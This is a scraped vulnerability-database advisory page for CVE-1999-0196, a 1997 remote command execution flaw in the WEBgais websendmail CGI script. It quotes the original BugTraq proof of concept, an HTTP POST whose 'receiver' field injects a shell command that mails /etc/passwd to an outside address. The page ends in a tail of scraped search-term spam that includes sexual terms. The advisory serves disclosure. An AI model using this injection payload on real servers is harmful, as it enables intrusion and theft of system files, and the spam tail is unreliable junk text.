about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , WEBgais websendmail Remote Command Execution Vulnerability


Title WEBgais websendmail Remote Command Execution Vulnerability
Published 1997-07-04-12:00AM
Updated 1999-06-01-12:00AM
Class Input Validation Error
CVE   CVE-1999-0196
Remote  Yes
Local  Yes
Credit  Posted to BugTraq on July 4, 1997 by Razvan Dragomirescu < drazvan@kappa.ro >
Vulnerable  WebGAIS Development Team WebGAIS 1.0 B2
WebGAIS Development Team WebGAIS 1.0 B1
WebGAIS Development Team WebGAIS 1.0
Not Vulnerable  
Code   From the BugTraq post by Razvan Dragomirescu:

telnet target.machine.com 80
POST /cgi-bin/websendmail HTTP/1.0
Content-length: xxx (should be replaced with the actual length of the string passed to the server, in this case xxx=90)

receiver=;mail+BUGTRAQ@NETSPACE.ORG</etc/passwd;&sender=a&rtnaddr=a&subject=a&content=a
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Thu, 04 Dec 2008 21:33:31 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
gayguys karinakapo www.lele92 Zoo sex.Co mysql exec Downloadse www.doctor servU posiciones Kim88 www.lelecy cookie sni 902 TCP/UD www.gzxmqj www./world Www.Bollyw t53t php-nuke 2 t865t mallu masa sexy sahee Bokep smu ../../inde Shleyalici powershopc mallu masa /search/ex Tamil sexx news searc joey xvideos.co Crissy Mor applicatio shahvatsar POKEMON HE Www animal vbulletin 2006-T-000 www.89.cco www.bbcper t235t 123xluos news for c porno+cart www.nepals sexy hot g global ann Ayshwariya xvideos.co Linux Kern